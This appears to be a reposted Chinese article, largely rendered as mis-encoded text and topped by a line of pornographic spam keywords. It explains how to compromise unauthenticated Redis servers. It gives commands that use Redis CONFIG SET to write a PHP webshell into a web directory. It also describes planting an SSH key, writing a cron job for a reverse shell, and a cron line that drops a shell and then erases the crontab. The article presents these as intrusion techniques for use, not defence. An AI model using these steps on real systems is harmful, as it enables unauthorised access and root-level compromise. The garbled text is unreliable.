自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

Redis 匿名訪問(wèn)利用技巧

安全 網(wǎng)站安全 Redis
redis還有一個(gè)發(fā)現(xiàn)就是,高版本的linux提權(quán)不了,我們也可以通過(guò)redis直接提權(quán),也就是第三方軟件提權(quán)的一種方法吧。

Redis 數(shù)據(jù)庫(kù)在內(nèi)網(wǎng)滲透中比較常見(jiàn),結(jié)合近期的利用過(guò)程,記錄下:

在內(nèi)網(wǎng)機(jī)器中下載Redis 解壓 make一下,不用make install

A) 一般情況下知道路徑寫shell

  1. ./redis-cli -h IP  
  2. config set dir /home/wwwroot/default 
  3. config set dbfilename redis.php 
  4. set webshell " phpinfo(); ?>"  
  5. save 

B) 利用公匙免密碼登錄1 本機(jī)生成公匙2 利用redis將公匙備份到redis機(jī)器上C) 利用linux的任務(wù)反彈shell

1 /var/spool/cron linux機(jī)器下默認(rèn)的計(jì)劃任務(wù),開(kāi)啟cron的時(shí)候,linux會(huì)定時(shí)去執(zhí)行里面的任務(wù),文件名為用戶名2 redis 設(shè)置dbfilename 到上面可以直接反彈shell回來(lái)

大概總結(jié)了主要是以上三種方式獲取redis服務(wù)器的權(quán)限,因?yàn)閞edis一般都是root權(quán)限啟動(dòng)的,所以權(quán)限很大。

但滲透過(guò)程中總是會(huì)出現(xiàn)意向不到的情況,有木有啊。

第一種方式,如果redis數(shù)據(jù)庫(kù)太大,導(dǎo)致php馬超限,直接500不解析,那我們可以通過(guò)第三個(gè)命令寫個(gè)馬到web目錄

  1. */1 * * * * echo " phpinofo();?>" >/var/www/html/90sec.php;crontab -r 

這樣的馬就沒(méi)問(wèn)題了

第二種方式,我測(cè)試本機(jī)沒(méi)問(wèn)題,但是到了滲透環(huán)境就出問(wèn)題了,應(yīng)該是ssh免密碼登錄 .ssh目錄權(quán)限問(wèn)題,成功幾率不太大

第三種方式,最喜歡的一種,簡(jiǎn)單粗暴明了,連提權(quán)都省了(如果是重要的機(jī)器,root用戶一般都會(huì)有計(jì)劃任務(wù),建議先用低權(quán)限的用戶反彈個(gè)shell上去 探下情況,在root) 但也遇到很奇葩的不給連接外網(wǎng)的機(jī)器,那就只能寫個(gè)shell到web目錄,或者在內(nèi)網(wǎng)監(jiān)聽(tīng)一個(gè)bashshell ,自己去連接就ok了

redis還有一個(gè)發(fā)現(xiàn)就是,高版本的linux提權(quán)不了,我們也可以通過(guò)redis直接提權(quán),也就是第三方軟件提權(quán)的一種方法吧。

責(zé)任編輯:武曉燕 來(lái)源: 紅黑聯(lián)盟
相關(guān)推薦

2011-03-04 15:38:54

Vsftpd

2011-11-24 21:05:44

ibmdw

2010-01-05 16:12:55

Javascript匿

2013-01-30 13:18:38

Redis監(jiān)控

2021-11-23 10:15:57

Linux代碼匿名頁(yè)

2010-08-18 13:13:01

靜態(tài)路由

2009-12-18 14:10:29

Ruby訪問(wèn)剪貼板

2009-12-31 13:56:57

ADO訪問(wèn)接口

2022-05-06 18:55:29

Java技巧Shellcode

2019-02-25 15:15:44

Windows 10Windows技巧

2024-02-27 09:43:37

Pythonlambda函數(shù)

2011-06-07 16:03:48

匿名SQL Server

2009-07-09 10:15:23

PHP DOM

2010-01-04 17:54:41

Silverligh訪

2012-05-16 10:30:11

遠(yuǎn)程訪問(wèn)安全策略

2009-07-03 13:56:21

JSP編程技巧

2016-03-01 14:37:38

iOSLLDB調(diào)試技巧

2023-04-06 10:26:25

Java內(nèi)存馬Jetty

2022-02-11 09:38:14

Java技巧反射

2011-09-01 10:31:16

ubuntuwindows
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)